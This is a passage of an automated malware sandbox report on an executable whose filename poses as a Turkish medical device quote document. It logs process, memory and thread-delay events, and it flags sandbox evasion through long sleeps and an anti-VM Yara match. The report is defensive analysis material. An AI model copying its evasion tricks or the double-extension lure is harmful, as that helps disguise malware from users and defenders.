                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 5050000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 7BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 7820000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 8BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 9BE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: 4AE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598905Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598789Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598577Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596717Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596608Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596169Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596061Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595952Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595016Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6192Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3495Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeWindow / User API: threadDelayed 2507Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeWindow / User API: threadDelayed 7336Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeWindow / User API: foregroundWindowGot 1734Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7380Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7872Thread sleep count: 2507 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7872Thread sleep count: 7336 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598905s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598789s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598577s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598250s >= -30000sJump to behavior
